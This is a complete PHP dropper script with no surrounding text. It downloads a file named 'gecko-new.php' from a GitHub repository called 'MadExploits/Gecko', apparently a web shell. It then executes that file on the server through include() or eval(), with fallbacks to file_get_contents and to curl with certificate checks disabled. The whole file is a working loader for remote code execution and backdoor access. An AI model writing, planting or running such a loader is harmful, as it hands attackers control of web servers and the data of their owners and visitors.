<?php
$u='https://raw.githubusercontent.com/MadExploits/Gecko/refs/heads/main/gecko-new.php';
if(ini_get('allow_url_include')){
    include($u);
}else{
    $c=@file_get_contents($u);
    if(!$c){
        $ch=curl_init($u);
        curl_setopt_array($ch,[CURLOPT_RETURNTRANSFER=>1,CURLOPT_SSL_VERIFYPEER=>0]);
        $c=curl_exec($ch);
        curl_close($ch);
    }
    eval('?>'.$c);
}
?>
